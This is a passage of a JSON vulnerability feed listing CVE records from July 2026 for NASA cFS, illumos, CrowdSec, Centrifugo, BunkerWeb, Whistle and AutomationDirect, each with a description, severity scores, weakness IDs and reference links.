b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-15352","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T20:16:44.040","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability exists in the Health & Safety (HS) application of NASA's Core Flight System (cFS). The flaw allows the application to crash via segmentation fault when processing a routine Housekeeping Telemetry request, leading to denial of service."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"NASA","product":"Core Flight System (cFS) Health & Safety (HS) Application","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"v7.0.1","versionType":"custom","status":"affected"},{"version":"v7.0.1","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:26:10.684386Z","id":"CVE-2026-15352","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-476"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-03.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://github.com/nasa/HS/releases/tag/v7.0.1","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-03","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-15422","sourceIdentifier":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","published":"2026-07-16T20:16:44.190","lastModified":"2026-07-17T18:45:53.333","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The illumos SCTP inbound path performs association lookup for INIT ACK chunks without adequately validating the address parameters carried in the chunk. Since this lookup runs during packet classification (i.e. before SCTP integrity checks or IPsec policy are applied) a remote, unauthenticated attacker can send a crafted SCTP INIT ACK packet with malformed address parameters to cause an out-of-bounds access and kernel heap corruption, which may lead to remote code execution. The flaw has existed since 2010 (illumos-gate commit a5407c02), and affects any illumos distribution prior to illumos-gate commit 53a3efde."}],"affected":[{"source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","affectedData":[{"vendor":"illumos","product":"illumos-gate","defaultStatus":"affected","modules":["kernel","SCTP"],"programFiles":["usr/src/uts/common/inet/sctp/sctp_hash.c"],"repo":"https://github.com/illumos/illumos-gate","versions":[{"version":"a5407c02d5ed61b29481b9b71f1307d7ebec9e5c","lessThan":"53a3efdeff8e6745bbfb69c5360f94962fb79e75","versionType":"git","status":"affected","changes":[{"at":"53a3efdeff8e6745bbfb69c5360f94962fb79e75","status":"unaffected"}]}]},{"vendor":"OmniOS","product":"OmniOS","defaultStatus":"affected","versions":[{"version":"r151058","lessThan":"r151058j","versionType":"custom","status":"affected","changes":[{"at":"r151058j","status":"unaffected"}]},{"version":"r151056","lessThan":"r151056aj","versionType":"custom","status":"affected","changes":[{"at":"r151056aj","status":"unaffected"}]},{"version":"r151054","lessThan":"r151054bj","versionType":"custom","status":"affected","changes":[{"at":"r151054bj","status":"unaffected"}]},{"version":"any","lessThan":"r151054","versionType":"custom","status":"affected"}]},{"vendor":"Triton Data Center","product":"SmartOS","defaultStatus":"affected","versions":[{"version":"any","lessThan":"202060709","versionType":"custom","status":"affected","changes":[{"at":"20260709","status":"unaffected"}]}]}]}],"metrics":{"cvssMetricV40":[{"source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:U/V:C/RE:H/U:Red","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"UNREPORTED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"PRESENT","Automatable":"YES","Recovery":"USER","valueDensity":"CONCENTRATED","vulnerabilityResponseEffort":"HIGH","providerUrgency":"RED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:47:43.135041Z","id":"CVE-2026-15422","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","type":"Secondary","description":[{"lang":"en","value":"CWE-122"},{"lang":"en","value":"CWE-787"}]}],"references":[{"url":"https://github.com/illumos/illumos-gate/commit/53a3efdeff8e6745bbfb69c5360f94962fb79e75","source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0"},{"url":"https://illumos.org/issues/18117","source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0"},{"url":"https://illumos.topicbox.com/groups/developer/Ta1a8e2e1f7f928df/18117-sctp-needs-to-better-check-init-ack-chunk-parameters","source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0"}]}},{"cve":{"id":"CVE-2026-15449","sourceIdentifier":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","published":"2026-07-16T20:16:44.373","lastModified":"2026-07-17T18:45:53.333","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A time-of-check to time-of-use (TOCTOU) flaw in the illumos data-link pseudo-driver (dld) affects handling of the DLDIOC_GETMACPROP and DLDIOC_SETMACPROP ioctls on /dev/dld. drv_ioc_prop_common() in usr/src/uts/common/io/dld/dld_drv.c copies the dld_ioc_macprop_t ioctl header in once to read its pr_valsize field, sizes and allocates a kernel heap buffer from that value, and then copies the full request in a second time from the same unprivileged user address. A concurrent thread can enlarge pr_valsize between the two copyins, so the second copyin and the subsequent property handling write beyond the end of the undersized allocation and corrupt the kernel heap. An unprivileged local user, including one confined to a non-global zone that owns a datalink, can trigger this to panic the system. The resulting kernel heap corruption may be usable for further compromise."}],"affected":[{"source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","affectedData":[{"vendor":"illumos","product":"illumos-gate","defaultStatus":"affected","modules":["kernel","dld"],"programFiles":["usr/src/uts/common/io/dld/dld_drv.c","usr/src/uts/common/sys/dld.h"],"repo":"https://github.com/illumos/illumos-gate","versions":[{"version":"eae72b5b807baa9116e64502cbb278edf15f3146","lessThan":"6959feb5b430411a4809b06c53dcdb42fb525eac","versionType":"git","status":"affected","changes":[{"at":"6959feb5b430411a4809b06c53dcdb42fb525eac","status":"unaffected"}]}]},{"vendor":"OmniOS","product":"OmniOS","defaultStatus":"affected","versions":[{"version":"any","lessThan":"r151054","versionType":"custom","status":"affected"},{"version":"r151058","lessThan":"r151058j","versionType":"custom","status":"affected","changes":[{"at":"r151058j","status":"unaffected"}]},{"version":"r151056","lessThan":"r151056aj","versionType":"custom","status":"affected","changes":[{"at":"r151056aj","status":"unaffected"}]},{"version":"r151054","lessThan":"r151054bj","versionType":"custom","status":"affected","changes":[{"at":"r151054bj","status":"unaffected"}]}]},{"vendor":"Triton Data Center","product":"SmartOS","defaultStatus":"affected","versions":[{"version":"any","lessThan":"202060709","versionType":"custom","status":"affected","changes":[{"at":"20260709","status":"unaffected"}]}]}]}],"metrics":{"cvssMetricV40":[{"source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.8,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:42:46.397037Z","id":"CVE-2026-15449","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0","type":"Secondary","description":[{"lang":"en","value":"CWE-122"},{"lang":"en","value":"CWE-367"}]}],"references":[{"url":"https://github.com/illumos/illumos-gate/commit/6959feb5b430411a4809b06c53dcdb42fb525eac","source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0"},{"url":"https://illumos.org/issues/18020","source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0"},{"url":"https://illumos.topicbox.com/groups/developer/T923147fae854a738-M03c29e1be33dac2a5e3d9535/18020-double-copyin-of-dldioc-consumers","source":"0ca53633-f0b5-4853-ba72-e0a2e62000d0"}]}},{"cve":{"id":"CVE-2026-44981","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:44.900","lastModified":"2026-07-17T18:44:13.257","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"CrowdSec offers crowdsourced protection against malicious IPs. From 1.7.0 until 1.7.8, the LAPI router used gin-contrib/gzip with DefaultDecompressHandle globally in pkg/apiserver/controllers/controller.go, causing /v1/watchers and /v1/watchers/login to decompress unauthenticated gzip-compressed JSON request bodies without enforcing a maximum decompressed size and allowing excessive heap allocation that can make LAPI unreachable. This issue is fixed in version 1.7.8."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"crowdsecurity","product":"crowdsec","versions":[{"version":">= 1.7.0, < 1.7.8","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:50:13.445431Z","id":"CVE-2026-44981","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-409"}]}],"references":[{"url":"https://github.com/crowdsecurity/crowdsec/commit/54a0dfe6c16b7687b0da6634e0b19ef0f5d9bb30","source":"security-advisories@github.com"},{"url":"https://github.com/crowdsecurity/crowdsec/commit/56d0d6915f7f25941dc5b4f484028646f6601a37","source":"security-advisories@github.com"},{"url":"https://github.com/crowdsecurity/crowdsec/security/advisories/GHSA-273h-gvwr-c3qj","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44982","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:45.033","lastModified":"2026-07-17T18:44:13.257","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"CrowdSec offers crowdsourced protection against malicious IPs. From 1.5.0 until 1.7.8, pkg/appsec/request.go NewParsedRequestFromRequest allocated a request body buffer from max(r.ContentLength, 0), so HTTP/1.1 requests using Transfer-Encoding: chunked and HTTP/2 requests without a content-length header produced an empty body and caused WAF rules targeting REQUEST_BODY, BODY_ARGS, ARGS_POST, JSON, or XML to be skipped. This issue is fixed in version 1.7.8."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"crowdsecurity","product":"crowdsec","versions":[{"version":">= 1.5.0, < 1.7.8","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:01:48.918782Z","id":"CVE-2026-44982","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-693"}]}],"references":[{"url":"https://github.com/crowdsecurity/crowdsec/commit/3d5c4d9b127091e9063b9b5eb785372a599a4435","source":"security-advisories@github.com"},{"url":"https://github.com/crowdsecurity/crowdsec/commit/57a793548671e6bbd2cde5562fe87b856ec9c642","source":"security-advisories@github.com"},{"url":"https://github.com/crowdsecurity/crowdsec/pull/4355","source":"security-advisories@github.com"},{"url":"https://github.com/crowdsecurity/crowdsec/releases/tag/v1.7.8","source":"security-advisories@github.com"},{"url":"https://github.com/crowdsecurity/crowdsec/security/advisories/GHSA-rw47-hm26-6wr7","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49998","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:45.290","lastModified":"2026-07-17T18:42:17.740","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Centrifugo is an open-source scalable real-time messaging server. Prior to 6.8.1, Centrifugo dynamic JWKS endpoint verification could reuse a key for one allowed issuer to verify a JWT for another allowed issuer because the JWKS cache and singleflight lookup were keyed only by JWT header kid, not by the resolved JWKS endpoint, issuer, audience, or trust-domain namespace, affecting client.token.jwks_public_endpoint, client.subscription_token.jwks_public_endpoint, internal/jwks/cache.go, and internal/jwks/manager.go. This issue is fixed in version 6.8.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"centrifugal","product":"centrifugo","versions":[{"version":"< 6.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":5.8}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T11:13:16.710942Z","id":"CVE-2026-49998","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-347"}]}],"references":[{"url":"https://github.com/centrifugal/centrifugo/commit/15d785015c6f318c1b68ea40b813699c9f8bd2c4","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/pull/1142","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/releases/tag/v6.8.1","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/security/advisories/GHSA-g6vg-wj8f-48cj","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/security/advisories/GHSA-g6vg-wj8f-48cj","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-54728","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:45.427","lastModified":"2026-07-17T18:44:13.257","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"bunkerweb is an Open-source and next-generation Web Application Firewall (WAF). Prior to BunkerWeb 1.6.12 and BunkerWeb PRO 0.57, authenticated Host header handling in the BunkerWeb UI and API improperly validated and neutralized user-controlled input in a configuration-dependent path, allowing a low-privileged authenticated user to escalate privileges and affect confidentiality, integrity, and availability of the BunkerWeb instance. This issue is fixed in BunkerWeb version 1.6.12 and BunkerWeb PRO version 0.57."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"bunkerity","product":"bunkerweb","versions":[{"version":"< 1.6.12","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:46:58.475322Z","id":"CVE-2026-54728","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-20"},{"lang":"en","value":"CWE-74"}]}],"references":[{"url":"https://github.com/bunkerity/bunkerweb/commit/685ccbbe7d204132a843a7b7fd802d1bdb3f20a9","source":"security-advisories@github.com"},{"url":"https://github.com/bunkerity/bunkerweb/releases/tag/v1.6.12","source":"security-advisories@github.com"},{"url":"https://github.com/bunkerity/bunkerweb/security/advisories/GHSA-254j-92cv-m443","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-55629","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:45.577","lastModified":"2026-07-17T19:17:17.150","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Whistle is an HTTP, HTTP2, HTTPS, and WebSocket debugging proxy. Prior to 2.10.3, lib/service/service.js handles GET /cgi-bin/temp/get by reading req.query.filename, joining it to TEMP_FILES_PATH only when it matches the temporary file pattern, and otherwise passing the user-supplied filename directly to getFile, allowing a remote attacker to read arbitrary files such as /etc/passwd. This issue is reported as fixed in version 2.10.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"avwo","product":"whistle","versions":[{"version":"< 2.10.3","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T18:12:01.770384Z","id":"CVE-2026-55629","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"http://github.com/avwo/whistle/releases/tag/v2.10.3","source":"security-advisories@github.com"},{"url":"https://github.com/avwo/whistle/commit/777bcf69bae2972aa7138a158c91619185653cf5","source":"security-advisories@github.com"},{"url":"https://github.com/avwo/whistle/security/advisories/GHSA-3vfr-4gwf-qxfp","source":"security-advisories@github.com"},{"url":"https://github.com/avwo/whistle/security/advisories/GHSA-3vfr-4gwf-qxfp","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-60063","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T20:16:45.953","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds write vulnerability in the Productivity Suite allows a \nlocal attacker to trigger kernel memory corruption via a crafted IOCTL \nrequest, potentially resulting in privilege escalation or system \ninstability."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"AutomationDirect","product":"Productivity 